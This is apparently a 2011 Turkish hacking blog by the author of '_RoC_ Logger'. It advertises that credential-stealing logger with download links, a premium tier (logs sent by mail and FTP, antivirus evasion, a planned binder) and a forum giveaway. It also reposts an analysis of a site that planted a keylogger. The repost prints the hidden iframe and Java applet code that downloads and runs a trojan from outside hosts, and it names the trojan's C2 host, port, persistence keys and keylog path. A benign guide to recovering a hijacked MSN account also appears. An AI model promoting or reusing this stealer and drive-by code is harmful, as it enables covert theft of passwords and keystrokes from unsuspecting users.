29 Kasım 2011 Salı
_RoC_ Logger 6.2 Güncelleme
*Programda Görsel Değişikler...
*Reklamda Küçük Değişikler...
*Premium Özellik Sayfası Eklendi...
*Güncelleme Rapor Bölümü Eklendi...
*Duyuru Bölümü Eklendi...
İNDİR
Çalınan Msn'i Geri Alalım...
En adi bigisayar korsanları olarak bilenen script kiddiler (script veletleri) hazır programları kullanarak bu tür bir işleme girişmektedirler. Ülkemizde rekor düzeylere ulaşan msn kullanımı nedeniyle bu tür bir olaya maruz kalmak bir çok insanın canını ciddi derecede sıkıyor ne yazıkki..
Bu yazıda msn hesabınızın nasıl çalındığını değil çalınan msn hesabınızı nasıl alacağınız okuyacaksınız.
MSN hesabınız çalındığında yapabilecekleriniz;
YOL 1:
- İlk önce https://support.msn.com adresine giriyorsunuz…
- Sonra karşımıza çıkan seçeneklerden MSN Hotmail Türkiye seçeneğini tıklıyoruz…karşımıza hesaplar ve faturalama desteği çıkacak onun altındaki e-posta desteğine tıklıyoruz…
- Sonra ad yazan yere isminizi yazın. (herhangi birşey olabilir)
- Tam oturum açma adı yani çalınan adresinizi buraya yazıyorsunuz
- Yanıtın hangi e-posta adresine gönderilmesini istersiniz yazan yere bir arkadaşınızın yada başka size ait olan mail adresinizi yazıyorsunuz ki gerekli mailler ve şifre o adrese gelecek..
- Altta ise yorum yazabileceğiniz yere urgent and important. my mail is hacking.help me please yazınız. ( veya kafanıza göre, ben öyle yaptım)
- Sorunun sıklığı ilk defa
- internet bağlantınızı da oradan seçebilirsiniz.buraya kadar ok..şimdi gönder diyerek gönderiyorsunuz ve yanıtın gelmesini istediğiniz mail adresine bir süre sonra şu şekilde bir mail geliyor
- - Name (kayıtta kullandığınız ismi yazınız)
- Sign-in name (çalınan mail adresinizi yazınız)
- Date of birth (kayıt edilmiş doğum tarihinizi yazınız)
- Country or Region (kayıttaki ülkenizi yazınız)
- State (şehri yazınız kayıttaki)
- ZIP or Postal Code (zip kodu)
- Approximate date of last successful sign-in, or an approximate date of account registration.(son giriş tarihinizi yazınız)
- List as many former passwords you used with this account as far back as you can remember(son kullandığınız şifreyi yazınız)
- List as many of your Folders as you can remember (listenize son gelen mailleri yazınız mail adreslerinizi yazınız )
- The name of your Internet Service Provider. If you access your account from outside your home (for example, from school or work) please include the name of the organization. (for work ) burası böyle kalsın
- List of Secret Questions and Answers historically associated with your account ( secret questions xxxxxxxxxxx answer xxxxxxxxx) xxxx li yerlere özel sorunuzu ve cevabınızı yazınız
NOT: Eğer mail gelmedi diyorsanız:
- http://register.passport.netcontactus.srflc=1055 bu adrese giriniz…
- Yukarıdan aşağıya bütün seçenekleri aynen yazdıktan sonra web tarayıcısı sürümü – işletim sistemini boş bırakın
- Hata iletisi ve açıklama yazan yere my mail is hacking.please help yazın…
- Mail iletişim adresinize geliyor ve yukarıdaki gibi doldurduktan sonra şifrenizi 1 gün içinde alıyorsunuz..
YOL 2:
Hotmail adresiniz alındıysa aşağıdaki yazıyı Hotmail’e mail gönderin. Türkçe yazan yerleri silin, uygun yerleri doldurun şifreniz size gönderilecektir.
Kime: passport@css.one.microsoft.com
Konu: My account has broken down
Mesaj:
Dear Sir Madam
I have been having proplem with my hot mail address. When I try to access to my account since Buraya hacklendiğiniz tarihi yazın. I found out my password and the secret question have been chanced.When I send you a request about new password the informations also were not match the ones. I remember and the ones you recorded. I also have seen someone is using my mesenger and chating with others on behalf of me.My phone bills credit card extres information come to this account and this person gives my phone numbers the other people
thanks your answer
my name is İsiminiz
sign in Mail adresiniz
my birthday Doğum tarihiniz
country Ülke
state Şehir
zip or postal code Posta Kutunuz
successfull sign En son bağlandığınız tarih
Approximate date of account registration Ne zamandır bu mail adresinizi kullandığınız
List as many former passwords you used with this account as far back as
you can remember Kullandığınız şifreler
List as many of your Folders as you can remembermailde sakladığınız dosyalar varmıydı varsa hatırladıklarınız
my internet service provider is internet bağlantınınızın adı
I would like you to solve this problem.Could you
change the password and send me new one so this can
not use my account. If this is not possibble could you
cancel my account.
Thankyou in advance , sincerely..
Buradaki işlemleri doğru bir şekilde yaptığınızda büyük ihtimal size şifrenizi göndereceklerdir
25 Kasım 2011 Cuma
Güzel Günler Göreceğiz...
24 Kasım 2011 Perşembe
_RoC_ Logger 6.1.2
Çeşitli Eklemeler Yapıldı.
VIP Üyelik İçin İletişim Paneli Eklendi.
HWID Bulucu Eklendi.
Küçük Sorunlar Aşıldı.
21 Kasım 2011 Pazartesi
_RoC_ Logger 6 (Türkçe Karakter Karşılıkları)
- ğ - [
- ü - ]
- ş - ;
- i - '
- ö - /\
20 Kasım 2011 Pazar
Visual Basic [250mb][Full]
111111111111111111111
LinCut Hotfile.com: One click file hosting: Upload bY _RoC_ - wwwturkhackteam.net - www.sibersavunma.com - www.hackcabin.com - roccoder@msn.com.rar
19 Kasım 2011 Cumartesi
Visual Studio 2010 [10mb]
17 Kasım 2011 Perşembe
_RoC_ Logger 6.1.1
Neyse :
6.1.1 Fix
splash screen eklendi.
araçlar bugu onarıldı.
http://adf.ly/3knxx
16 Kasım 2011 Çarşamba
_RoC_ Logger 6.1 Güncelleme Bildirimi
_RoC_ Logger 6.1 Güncellemesi
Yapılacak güncelleme ile.
Kullanım sözleşmesi eklenecek
Bekleme formundaki ayarlar geliştirilecek
Araçlar sadece çalıştırılacak (klasore çıkmayacak)
Görünümde ufak değişiklik yapılacak
Küçük hatalar giderilecek
Yeni birkaç özellik eklenecek
14 Kasım 2011 Pazartesi
_RoC_ Logger 6 Anlatım...
Destek...
1 TIK Yeter :D
http://lcut.in/rE7
_RoC_ Logger 6 Premium Özellikleri
- Reklam Derdi Yok
- Kayıtlar Mail Gibi FTP'ye de Gönderilir.
- Olabildiğince Anti-Virüslerden Kaçırılmıştır.
- Stealerlar'a Ayriyetten DNSDNS Eklenmiştir.
- Binder Ve Çeşitli Araçlar Eklenecektir.
13 Kasım 2011 Pazar
_RoC_ Logger 6
Ve Kazanan....
12 Kasım 2011 Cumartesi
10 Kasım 2011 Perşembe
_RoC_ Logger 6 Bayram Hediyesi
Bu konu altina sadece tht profil linkinizi yazin.sansli bir kisiye roc logger 6da 3 aylik hediye vericem.
cekilis bir random koduyla yada buna benzer bir site ile olacak
Bir kisi kazanacak
Tht profil adresi yazmaniz yeterlidir
Odul 3 aylik premium.
100 mesaj ustu olmayan katilamaz
Hadi kolay gelsin :)
9 Kasım 2011 Çarşamba
_RoC_ Logger 6 ® Istekleri Alayım
Arkadaslar yeni surumdeki isteklerinizi bu konu altinda belirtiniz...
Uyarı
Beyler simdiden soyleyeyim.Logger 6 ciktimi burasi reklamdan gecilmeyecek.zaten 1-2 reklamin kimseye zarari olmaz :D.O kadar ugrasiyoruz.biraz para kazanalim :D
8 Kasım 2011 Salı
Ben Böyle Dev Tool'un...
DiziPort 'ta Keylogger !
kaynak : http://www.eksisozluk.com/show.asp?id=26061448
"windows bilgisayarlarda cok yuksek ihtimalle (edit: dogrulandi!) bir virus calistiran bir sitedir. evet, kullanicilarin klavyelerinde bastiklari her tusu (sifreler, mesajlar vb, bir dosyaya kaydedip o dosyayi baskasina yolluyor) (bkz: keylogger)
(cok uzun lan bu okumam diyenlere ozet: diziport, java applet'ler araciligiyla baska bir siteden keylogger programi indirip onu calistiriyor)
nasil bir sey yaptiklarini birlikte gorelim.
sitenin kaynak kodunda,
--- kod 1---
<a href="http://twitter.com/diziport" title="" style="font-size:12px;"><iframe name="java" src="www.metinozdogan.com.tr/java/" width="1" height="1" scrolling="no" frameborder="0" marginwidth="0" marginheight="0"></iframe></a>
--- kod 1 ---
seklinde bir satir var. bunun yaptigi sey, siz sitenizi acinca tarayicida gorunmeyen bir pencerede metin ozdogan'in sitesinden (evet adini da yazalim da ne numaralar cevrildigi belli olsun) kodda gorulen sayfayi cagiriyor. (bkz: iframe)
peki bu sayfada ne var? "www.metinozdogan.com.tr/java/client.jar" seklinde bir java applet'i yukleyen bir kod. (dosya silinmis ama entry'nin devaminda butun bu dosyalar indirilebilir)
--- kod 2 ---
<applet code='javaupdater.class' width='1' height='1' archive='www.metinozdogan.com.tr/java/client.jar'>
<param name="url" value="www.medyaturk24.com/java/java.exe" />
</applet>
--- kod 2 ---
peki bu client.jar'in icinde ne var diyorsaniz, indirip decompile edip gorelim. icinden javaupdater.class cikiyor. hatta bakin ne guzel, hazir yapilmisi var:
--- kod 3 ---
http://pastebin.com/bmfv8xfp
--- kod 3 ---
peki bu java kodu ne yapiyor biraz aciklayacak olursak,
1) (windows bilgisayarlarda) c:\documents and settings\kullaniciadiniz\rundll32.exe seklinde, sistem dosyasi gibi gorunen ama aslinda sistem dosyasi olmayan bir dosya yaratiyor.
2) sonra kod 2'deki (bakin yukarda) url parametresinde yazan www.medyaturk24.com/java/java.exe (tiklamayin) dosyasini bilgisayariniza indiriyor ve bu dosyayi iste o rundll32.exe'nin icine yazip bilgisayara koyuyor.
3) sonra da bu internetten indirdigi dosyayi bilgisayarinizda calistiriyor. (kod 3, satir 50).
http://www.medyaturk24.com/java/ adresine gittiginizde muhtemelen daha once kullandiklari virusleri (ya da ne haltsa artik?) bulabiliyorsunuz. (82.exe 83.exe 84.exe 85.exe java.exe)
olur da silinir diye, butun bu dosyalari (exe'ler, .class, jar) zipleyip http://ge.tt/9dzsvf9 adresine koydum. link expire olursa isteyen yazarlar mesaj atabilirler tekrar koyarim.
java.exe adiyla gorunen dosyanin ne yaptigini benden daha tecrubeli reverse engineer'lara birakiyorum. sanirim emrah beyazkaya (https://www.facebook.com/unlemisareti) (diziport'un sahibi) simdi bize bir aciklama borclu, kim bu metin ozdogan, ne bu medyaturk'ten cekilen java.exe ve neden insanlarin bilgisayarlarinda calistiriliyor.
saygilar.
~~~~~~~~~~~~~~~~~~~~~~~
devami unpacked adli sozluk yazarindan geliyor, helal olsun adam ugrasmis.
--- spoiler ---
java.exe sunlari yapiyor:
enigma protector isimli bir yazılımla uygulamayı şifreleyerek antivirüslerden kaçmaya çalışmış ama pek başarılı olamamış sağlam antivirüsler tanıyor hatta 2 kere şifreleme yapılmış. önce aspack isimli uygulama ile (ki asıl dosya bu). sonra onu temp klasörüne çıkarıp çalıştıracak dosyayı da enigma ile şifrelemiş.
bilgisayara uzaktan erişmeyi sağlayan bir trojan bu. tipik trojan hareketi olarak kendini varsayılan tarayıcı gibi gösteriyor processlerde. ayrıca tarayıcı kapanırsa diye yedek olarak svchost.exe'nin de içine giriyor.
kendini c:\?windows\?system32\?installdir\?nod.exe olarak kopyalıyor ve bunu bilgisayar başlangıcında açılacak şekilde ayarlıyor. bu büyük ihtimal uac etkin olan sistemlerde c:\users\user\appdata\roaming\nod.exe olur.
yine klasik trojan hareketi olarak registry'de local machine ve current user/software/microsoft/currentversion/run ve local machine/software/microsoft/?active setup/?installed components yerlerine yazarak yapıyor başlangıçta açılma ayarını. installed components altındaki keyi ?{8b51u067-e68s-ar02-qep7-i1l0440op7h3}
yalnız bu başlangıç bilgilerini trojan çalışırken silmek işe yaramaz. yeniler sürekli. önce nod.exe kaldırılmalı.
trojan sahibine ulaşmak için stapler4445.no-ip.org adresinden ip bilgisini alıyor. o dns adresi trojanın sahibinin bağlantısını açıp kapadığında falan değişen ip adresini güncel olarak tutuyor. işte trojan da o ip adresine bağlanıp sahibinin listesinde bağlanılabilir olarak görülüyor. kullandığı port 3361.
keylog bilgilerini yani bastığın her tuşun kaydedildiği dosya c:\documents and settings\user\application data\microsoft\windows\uwcuemzbapecg.dat burada tutuluyor bu vista ve üzerinde değişir tabi. c:\users\user\appdata\ içinde bir yerlerde olur. şu uwcuemzbapecg kısmı da bilgisayara göre değişebilir bir ihtimal.
--- spoiler ---
onemli not: buyuk ihtimal bu siteye windows makinayla girdiyseniz virus kapmissiniz demektir. guncel bir anti-virus tarayici program isinizi gorecektir. (bkz: avira) bilgisayariniza full tarama yapin mumkunse."
6 Kasım 2011 Pazar
Beyonce Açıklaması
Fikirleriniz , Önerileriniz , Düşünceleriniz
Eğer Önerilerinizi Paylaşmak İstiyorsanız : Roccoder.Uservoice
Eğer Düşüncelerinizi Paylaşmak İstiyorsanız : Bloguma yorum bırakarak...
Yardımcı Olabilirsiniz
4 Kasım 2011 Cuma
_RoC_ Logger 5'teki Log Gönderim Sorunun Nedeni...
- İşletim Sisteminiz Ve _RoC_ Logger Arasındaki Uyuşmazlık
- Kodlamadan Kaynaklı Bir Hata ( Bug) !!!
2 Kasım 2011 Çarşamba
_RoC_ Logger 6 // Durum Bildirimi
1 Kasım 2011 Salı
23avye s6r4n4
+4anda 6rne2 ver5y6r40
EVET sorunumuz buysa yani harfler rakamlar karisik ise (notebooklarda)
yapmamiz gereken sey >
fn ve num lock tusuna basmak